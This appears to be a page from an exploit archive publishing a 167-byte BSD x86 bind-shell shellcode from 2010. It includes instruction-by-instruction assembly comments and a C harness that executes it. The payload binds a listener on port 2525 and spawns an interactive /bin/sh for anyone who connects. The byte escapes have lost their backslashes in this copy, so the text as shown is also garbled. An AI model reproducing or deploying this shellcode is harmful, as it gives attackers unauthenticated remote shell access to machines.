[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : bds/x86-bindshell on port 2525 shellcode - 167 bytes
# Published : 2010-08-25
# Author :
# Previous Title : Linux x86_64 - add user with passwd (189 bytes)
# Next Title : Linux/MIPS - reboot() - 32 bytes.
==================================================
bds/x86-bindshell on port 2525 shellcode 167 bytes
==================================================
/*
-------------- bds/x86-bindshell on port 2525 167 bytes -------------------------
* AUTHOR : beosroot
* OS : BSDx86 (Tested on FreeBSD)
* EMAIL : beosroot@hotmail.fr
beosroot@null.net
* GR33TZ To : joseph-h, str0ke, MHIDO55,.....
*/
const char shellcode[] =
"x6ax00" // push $0x0
"x6ax01" // push $0x1
"x6ax02" // push $0x2
"x50" // push %eax
"x6ax61" // push $0x61
"x58" // pop %eax
"xcdx80" // int $0x80
"x50" // push %eax
"x6ax00" // push $0x0
"x6ax00" // push $0x0
"x6ax00" // push $0x0
"x6ax00" // push $0x0
"x68x10x02x09xdd" // push $0xdd090210
"x89xe0" // mov %esp,%eax
"x6ax10" // push $0x10
"x50" // push %eax
"xffx74x24x1c" // pushl 0x1c %esp
"x50" // push %eax
"x6ax68" // push $0x68
"x58" // pop $eax
"xcdx80" // int $0x80
"x6ax01" // push $0x1
"xffx74x24x28" // pushl 0x28 %esp
"x50" // push %eax
"x6ax6a" // push $0x6a
"x58" // pop $eax
"xcdx80" // int $0x80
"x83xecx10" // sub $0x10,$esp
"x6ax10" // push $0x10
"x8dx44x24x04" // lea 0x4%esp,%eax
"x89xe1" // mov %esp,%ecx
"x51" // push %ecx
"x50" // push %eax
"xffx74x24x4c" // pushl 0x4c %esp
"x50" // push %eax
"x6ax1e" // push %0x1e
"x58" // pop %eax
"xcdx80" // int $0x80
"x50" // push %eax
"xffx74x24x58" // pushl 0x58 %esp
"x50" // push %eax
"x6ax06" // push $0x6
"x58" // pop %eax
"xcdx80" // int $0x80
"x6ax00" // push $0x0
"xffx74x24x0c" // pushl 0xc %esp
"x50" // push %eax
"x6ax5a" // push $0x5a
"x58" // pop %eax
"xcdx80" // int $0x80
"x6ax01" // push $0x1
"xffx74x24x18" // pushl 0x18 %esp
"x50" // push %eax
"x6ax5a" // push $0x5a
"x58" // pop %eax
"xcdx80" // int $0x80
"x6ax02" // push $0x2
"xffx74x24x24" // pushl 0x24 %esp
"x50" // push %eax
"x6ax5a" // push $0x5a
"x58" // pop %eax
"xcdx80" // int $0x80
"x68x73x68x00x00" // push $0x6873
"x89xe0" // mov %esp,%eax
"x68x2dx69x00x00" // push $0x692d
"x89xe1" // mov %esp,%ecx
"x6ax00" // push $0x0
"x51" // push %ecx
"x50" // push %eax
"x68x2fx73x68x00" // push $0x68732f
"x68x2fx62x69x6e" // push $0x6e69622f
"x89xe0" // mov %esp,%eax
"x8dx4cx24x08" // lea 0x8 %esp,%ecx
"x6ax00" // push $0x0
"x51" // push %ecx
"x50" // push %eax
"x50" // push %eax
"x6ax3b" // push $0x3b
"x58" // pop %eax
"xcdx80"; // int $0x80
int main() {
void (*hell)() = (void *)shellcode;
return (*(int(*)())shellcode)();
}
// the end o.O